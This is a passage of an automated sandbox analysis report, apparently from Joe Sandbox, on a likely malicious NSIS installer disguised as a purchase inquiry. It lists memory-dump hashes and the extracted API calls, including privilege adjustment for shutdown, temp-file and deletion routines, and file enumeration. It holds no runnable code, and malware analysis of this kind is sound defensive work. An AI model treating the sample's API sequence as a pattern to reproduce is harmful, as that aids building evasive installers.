                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3042c8bd72091f635f69415957f5e1e3c65f4593b7c9819e23dc75c0a3645210
                                                                    • Instruction ID: a08242190ca46fcba9f57d842db3def7ed59d9956d2cd083a7239aee463a18fb
                                                                    • Opcode Fuzzy Hash: 3042c8bd72091f635f69415957f5e1e3c65f4593b7c9819e23dc75c0a3645210
                                                                    • Instruction Fuzzy Hash: AA515D70A003059FDB14DBA5C594A8EBBF2EF84340F258529D805AF355EB75ED8ACB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e4f2414e77fc078d168aef8e44b0b7f449ddd2a46332fd2f6085cc7a74fa4b2
                                                                    • Instruction ID: 28b2d5797182c623d6a4cf7d941bdc815caeb152167e7ac6571f15c74fc71f27
                                                                    • Opcode Fuzzy Hash: 4e4f2414e77fc078d168aef8e44b0b7f449ddd2a46332fd2f6085cc7a74fa4b2
                                                                    • Instruction Fuzzy Hash: 74419F76A006058FEB70CFA9C8C479EFBF2FBA4310F14492AD156DB211E731E9498B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7450b63ab00fb7e5ea9ed06c695ef072da12d03e78adbbee274aca5d0b87266
                                                                    • Instruction ID: f585a41de393b69f4ac4109b5995a9119c279cd3a1b1c91aa958990fc8e91f59
                                                                    • Opcode Fuzzy Hash: b7450b63ab00fb7e5ea9ed06c695ef072da12d03e78adbbee274aca5d0b87266
                                                                    • Instruction Fuzzy Hash: 11316178B102058BFF64CAA5C9C075EBB73EB89390F64483AD505DB394E734D8458791
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5aaa807359f50463ef9b4b011b7cfcc12c43c4e37c8f6c608e6749ad235b04cc
                                                                    • Instruction ID: 939c4a2cda5ea4e64169fec7bb2142abfce4405c4c9d25eb31ebc89d2c1c1f1d
                                                                    • Opcode Fuzzy Hash: 5aaa807359f50463ef9b4b011b7cfcc12c43c4e37c8f6c608e6749ad235b04cc
                                                                    • Instruction Fuzzy Hash: 7A318EB5E002569FEB14CFB9C8D0A9DBBF2AB48750F158165E901EB391E730D9468B90
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 587b1b9be41a9a652c6325f11e664ccf8f6faf205ccccac4ae5bacec8c77b12e
                                                                    • Instruction ID: 29892f11fe8b47dfcbc7e68697348b00da1cbe3e3f411a680afc2c149426ce60
                                                                    • Opcode Fuzzy Hash: 587b1b9be41a9a652c6325f11e664ccf8f6faf205ccccac4ae5bacec8c77b12e
                                                                    • Instruction Fuzzy Hash: 522139B9A002159FEB04CFA9C8D0A9EBBF6FB48750F108125E915EB340E730D9468B90
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e36a0dbe6d5d431c696779baf58e2aed55b91d037a85fbe9f73a34df288d7ce7
                                                                    • Instruction ID: 4ecd2be7bc0014e96c70c4cfcb328646bee3cd5dc0e6c7cd1cc4a16b8c3301dd
                                                                    • Opcode Fuzzy Hash: e36a0dbe6d5d431c696779baf58e2aed55b91d037a85fbe9f73a34df288d7ce7
                                                                    • Instruction Fuzzy Hash: EE1129B9B006251BEF959B7588C42DBFBEBEBC9351F51423AD506EB250FB10880B47E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db7cc0f4a9a815ef2d032d5e03e5ad2eeadf7e763c9af559e04ac394536fda97
                                                                    • Instruction ID: a1bfe9b82d26359a8d3769d334d27302215b2ba6dec3b02565ad17ff46abad9e
                                                                    • Opcode Fuzzy Hash: db7cc0f4a9a815ef2d032d5e03e5ad2eeadf7e763c9af559e04ac394536fda97
                                                                    • Instruction Fuzzy Hash: 1E11A535B005244BDF599A79C8D469FB7E7EBC8351F108536D406EB354EF24DD068BA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6ca1b3f074698384e2f92e361ed34ad3d83492d8e92ff2f880e872a8c15a276
                                                                    • Instruction ID: 2eacc4c1e3a6e17335955ef7811a1b30826b73899a4e1a5e79488829f3d4ea8b
                                                                    • Opcode Fuzzy Hash: e6ca1b3f074698384e2f92e361ed34ad3d83492d8e92ff2f880e872a8c15a276
                                                                    • Instruction Fuzzy Hash: 102147B68002499FCB10CF9AD981BDEBFF5FF58320F158419E518AB210D339A595DFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b8036a49014395cb082f95b2ee62c8b3257c5b324cf75ab7e412abdcbac6c1fc
                                                                    • Instruction ID: 34123b666156c51d6ed61f588ecf84857b4e660b24ff8d9f7c9ceb8f5cc26b47
                                                                    • Opcode Fuzzy Hash: b8036a49014395cb082f95b2ee62c8b3257c5b324cf75ab7e412abdcbac6c1fc
                                                                    • Instruction Fuzzy Hash: 8E2124B1D002599FCB00CFAAD884ADEFFB8FF48310F50812AE518A7201D378A954CBA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5bb1af3a2485b63672cf2e56d69832e4ecfbdb83397ff36ac51f3739d9b0789
                                                                    • Instruction ID: 68120843cf0f4d00d0b812e994ac6550fb82067aaca365dcce33d42ff34e4fe5
                                                                    • Opcode Fuzzy Hash: e5bb1af3a2485b63672cf2e56d69832e4ecfbdb83397ff36ac51f3739d9b0789
                                                                    • Instruction Fuzzy Hash: D221C2B5D00659AFCB00DF9AD884ADEFFB4FB49310F50852AE518A7300D378A954CBE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732940947.000000003A890000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a890000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b00f5ad23b1f3c3cca61134e2318c690939fe0a1ab269eebf2c9d0c89c2029e
                                                                    • Instruction ID: af50e76135d69280c98c273bfb412abb60fb6f67f6437f30ee673f6dc395036f
                                                                    • Opcode Fuzzy Hash: 9b00f5ad23b1f3c3cca61134e2318c690939fe0a1ab269eebf2c9d0c89c2029e
                                                                    • Instruction Fuzzy Hash: B501B1303082408FD7196B3C99A42EE7BE79FC9255719493DE05ACB742DF28DC068752
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b04021ce2c9eac00875ded2b58edc30e69e292ab4088f7c09675acc15450f6f5
                                                                    • Instruction ID: 5efaca58aa0d908ab1a8c4267b8cc3a493591c1abf3292ec840bce65dca923b3
                                                                    • Opcode Fuzzy Hash: b04021ce2c9eac00875ded2b58edc30e69e292ab4088f7c09675acc15450f6f5
                                                                    • Instruction Fuzzy Hash: 221146B6800249DFCB10CF9AD841BDEBFF4EF48320F248419E518A7200D339A595DFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd09d76190a119778062c6383b59c9ee9cc789b64742c74a6d82c74dc339c7c6
                                                                    • Instruction ID: 17ceced7cc48d21e53689d0fce10cdf5ca7c5be2fe867b330a97df783e26c9e4
                                                                    • Opcode Fuzzy Hash: bd09d76190a119778062c6383b59c9ee9cc789b64742c74a6d82c74dc339c7c6
                                                                    • Instruction Fuzzy Hash: 330186347000110BEB4596AD84D1B1BF7EBCBCAB61F24843AE50AEB340E969DC024781
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73c165e3c440954ef54c10b26b9810a3b333795c357a5b8a9afee9b91f3ee7ec
                                                                    • Instruction ID: f138c60523207c471bf02a0400e5308adebdbd5935dd58a788ea6ff63715ba32
                                                                    • Opcode Fuzzy Hash: 73c165e3c440954ef54c10b26b9810a3b333795c357a5b8a9afee9b91f3ee7ec
                                                                    • Instruction Fuzzy Hash: 4A018C357000110BEB559A7C84A0B2EB6EBDBC9760F24893AF50ADB341EE69EC038781
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0d3ab7809df25b57c3fdddae95ee65dbace21ec4128f3dcf8ec25c66bfca12ad
                                                                    • Instruction ID: 4909ea84b4d20494b52ddb1d2217313bde403f1ff71afe3cb7e3db04ec2abc38
                                                                    • Opcode Fuzzy Hash: 0d3ab7809df25b57c3fdddae95ee65dbace21ec4128f3dcf8ec25c66bfca12ad
                                                                    • Instruction Fuzzy Hash: 77F02835F64238E7DB519A65D8546CFB73AFBC4761F504039F901FB201EA20A80A87C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 78001b34873bc8830342556e4cfe05f98fda3f78bd88e7b0a61deb8b82530438
                                                                    • Instruction ID: cb8f03f874832818a4f121f8ab636273df67e394724d93b11b017c4e07583f01
                                                                    • Opcode Fuzzy Hash: 78001b34873bc8830342556e4cfe05f98fda3f78bd88e7b0a61deb8b82530438
                                                                    • Instruction Fuzzy Hash: 36F0BB31F102195BEF549AA8C49168EBBB6E785351F10453AE50DEB340E531DD46C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e4f5f0ab61a2cccf92535fd1e93da5c119cc0ce419b84db99652d4455682bb79
                                                                    • Instruction ID: 5cf99299a8e87032e1ca51ac08dc69d1391e7272807d0f5f8de2c2cd74c31091
                                                                    • Opcode Fuzzy Hash: e4f5f0ab61a2cccf92535fd1e93da5c119cc0ce419b84db99652d4455682bb79
                                                                    • Instruction Fuzzy Hash: AFE04F347582454FE362867485C8B3A3E6BEB853A0F140473E407DB282E215CC598222
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 24cd0cf1262fb260e3a7a14826afaf120fe48dbaaf4f1755f5e0e1eef1d43b0a
                                                                    • Instruction ID: 001e038a6552933bd640be5c9b4dbf0acf17a1f0e4e09a62570b02530966c365
                                                                    • Opcode Fuzzy Hash: 24cd0cf1262fb260e3a7a14826afaf120fe48dbaaf4f1755f5e0e1eef1d43b0a
                                                                    • Instruction Fuzzy Hash: EBE09235A60328A7D7599A71C844A8B777AEB88740F404438F901BB344EF65A84587C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732940947.000000003A890000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a890000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92acf0ac48b325e1f4f1452ddeea62e2a7beabdefe0156f256cc770dcd1e3b57
                                                                    • Instruction ID: 9bf3b44b68bd210dcfe79356b14354ed69d71a3ea6ed2741ca7d1caa1d56eebc
                                                                    • Opcode Fuzzy Hash: 92acf0ac48b325e1f4f1452ddeea62e2a7beabdefe0156f256cc770dcd1e3b57
                                                                    • Instruction Fuzzy Hash: 8FE02BB060D3045FD3628B7898442913FFEAB46310F41469FF0CED7691DBA46901C794
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6d047f788917e9517040024ac17a68f7e1f38d065251da8270189bdad3d3b626
                                                                    • Instruction ID: 16c2472c7b3963dcae5607b97d85b0685a99fc1e3a47e385f91f1ee15c8060ce
                                                                    • Opcode Fuzzy Hash: 6d047f788917e9517040024ac17a68f7e1f38d065251da8270189bdad3d3b626
                                                                    • Instruction Fuzzy Hash: 44D09E36B006159FEF015BA0FC5999C7775FB853A5F104061E90697260DB391916CB41
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32 ref: 0040328D
                                                                    • GetVersion.KERNEL32 ref: 00403293
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                                    • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                                    • OleInitialize.OLE32(00000000), ref: 004032E6
                                                                    • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                                    • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                                    • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 0040332A
                                                                    • CharNextW.USER32(00000000,00434000,00000020), ref: 00403351
                                                                      • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                      • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                    • GetTempPathW.KERNEL32(00000400,00436800), ref: 0040348B
                                                                    • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040349C
                                                                    • lstrcatW.KERNEL32(00436800,\Temp), ref: 004034A8
                                                                    • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004034BC
                                                                    • lstrcatW.KERNEL32(00436800,Low), ref: 004034C4
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004034D5
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 004034DD
                                                                    • DeleteFileW.KERNEL32(00436000), ref: 004034F1
                                                                      • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                    • OleUninitialize.OLE32(?), ref: 004035BC
                                                                    • ExitProcess.KERNEL32 ref: 004035DD
                                                                    • lstrcatW.KERNEL32(00436800,~nsu), ref: 004035F0
                                                                    • lstrcatW.KERNEL32(00436800,0040926C), ref: 004035FF
                                                                    • lstrcatW.KERNEL32(00436800,.tmp), ref: 0040360A
                                                                    • lstrcmpiW.KERNEL32(00436800,00435800,00436800,.tmp,00436800,~nsu,00434000,00000000,?), ref: 00403616
                                                                    • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403632
                                                                    • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                                    • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 004036A0
                                                                    • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                                    • ExitProcess.KERNEL32 ref: 00403783
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                    • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 2488574733-3195845224
                                                                    • Opcode ID: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
                                                                    • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                                    • Opcode Fuzzy Hash: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
                                                                    • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                                    • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                                                    • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                                    • GlobalFree.KERNEL32(?), ref: 00404F25
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00405076
                                                                    • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                                    • ShowWindow.USER32(00000000), ref: 004050D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 1638840714-813528018
                                                                    • Opcode ID: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
                                                                    • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                                    • Opcode Fuzzy Hash: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
                                                                    • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (gt:$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$gt:
                                                                    • API String ID: 0-1676209248
                                                                    • Opcode ID: e02c965f0385de3150e67156ac93b85624513ca7a265f82fc7c446b2312c3b1b
                                                                    • Instruction ID: c63558011bf6a91e3479914828f4a2e167429535dfdc98b65a63925b553f5b97
                                                                    • Opcode Fuzzy Hash: e02c965f0385de3150e67156ac93b85624513ca7a265f82fc7c446b2312c3b1b
                                                                    • Instruction Fuzzy Hash: 9F123C74A00259DFDB28DFA5C8D4A9DB7B2BF89300F209569D409AB355EB38DD85CF80
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,75C43420,00436800,00000000), ref: 00405834
                                                                    • lstrcatW.KERNEL32(004246F0,\*.*), ref: 0040587C
                                                                    • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                                                    • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,75C43420,00436800,00000000), ref: 004058A5
                                                                    • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,75C43420,00436800,00000000), ref: 004058B5
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                                    • FindClose.KERNEL32(00000000), ref: 00405964
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
